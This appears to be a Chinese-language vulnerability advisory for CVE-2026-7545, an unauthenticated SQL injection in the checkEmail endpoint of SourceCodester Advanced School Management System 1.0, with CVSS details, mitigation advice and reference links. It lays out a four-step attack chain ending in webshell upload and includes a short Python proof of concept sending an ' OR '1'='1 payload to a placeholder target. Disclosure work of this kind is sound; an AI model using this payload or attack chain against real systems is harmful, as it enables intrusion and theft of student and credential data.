CVE-2026-7545 CVSS 7.3 高危

CVE-2026-7545 SourceCodester 学校管理系统 SQL 注入漏洞

披露日期: 2026-05-01

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7545

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

SourceCodester Advanced School Management System

漏洞概述

SourceCodester Advanced School Management System 1.0 版本中存在高危 SQL 注入漏洞。该漏洞位于 commonController.php 文件的 checkEmail 端点，由于未对用户输入进行严格过滤，导致攻击者可远程执行恶意 SQL 语句。由于攻击无需认证且无需交互，攻击者可轻易利用此漏洞窃取数据库敏感信息、篡改数据或影响系统可用性。

技术细节

该漏洞源于 SourceCodester Advanced School Management System 1.0 中 `commonController.php` 文件的 `checkEmail` 接口未对传入的参数进行严格的过滤或预编译处理。攻击者可以通过向该端点发送特制的 HTTP 请求，将恶意 SQL 语句注入到后端数据库查询中。由于 CVSS 向量显示无需认证（PR:N）和无需用户交互（UI:N），攻击者可以直接通过网络（AV:N）发起攻击。利用此漏洞，攻击者可能绕过登录验证，提取数据库中的用户凭证、学生信息等敏感数据，或者在特定条件下执行写入操作，影响系统的完整性。

攻击链分析

STEP 1

侦察

攻击者通过网络扫描识别出运行 SourceCodester Advanced School Management System 1.0 的目标服务器。

STEP 2

漏洞探测

攻击者向 `commonController.php` 的 `checkEmail` 端点发送包含单引号或特定 SQL 语法（如 ' OR 1=1）的测试请求，观察响应差异以确认 SQL 注入点。

STEP 3

恶意攻击

确认漏洞存在后，攻击者构造高级 SQL Payload（如 UNION SELECT 或盲注语句）以提取数据库结构、管理员密码或敏感数据。

STEP 4

后续利用

利用获取的凭证登录系统后台，进一步上传 Webshell 或篡改数据，完全控制应用系统。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_sqli(target_url):
    # Vulnerable endpoint: checkEmail in commonController.php
    payload = "?action=checkEmail&email=admin' OR '1'='1-- -"
    full_url = f"{target_url}/commonController.php{payload}"
    
    try:
        response = requests.get(full_url, timeout=5)
        # Analyze response to confirm injection based on application logic
        if response.status_code == 200:
            print(f"[+] Potential SQL Injection detected at {full_url}")
            print(f"[+] Response length: {len(response.text)}")
        else:
            print("[-] Request failed")
    except Exception as e:
        print(f"Error: {e}")

if __name__ == "__main__":
    target = "http://TARGET_IP"
    check_sqli(target)

影响范围

SourceCodester Advanced School Management System 1.0

防御指南

临时缓解措施

在官方修复补丁发布前，建议管理员在 WAF 中添加针对 `commonController.php` 接口的防护规则，拦截包含 SQL 关键字（如 SELECT, UNION, OR, AND, '）的请求。同时，应检查并修改代码，使用 PDO 或 MySQLi 的预处理机制来处理 `email` 参数，从根本上阻断注入风险。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7545
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7545
3 Details https://www.cvedetails.com/cve/CVE-2026-7545/
4 VulDB https://vuldb.com/cve/CVE-2026-7545
5 Link https://github.com/eqwerwq/CVE/issues/2
6 Link https://vuldb.com/submit/804340
7 Link https://vuldb.com/vuln/360356
8 Link https://vuldb.com/vuln/360356/cti
9 Link https://www.sourcecodester.com/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表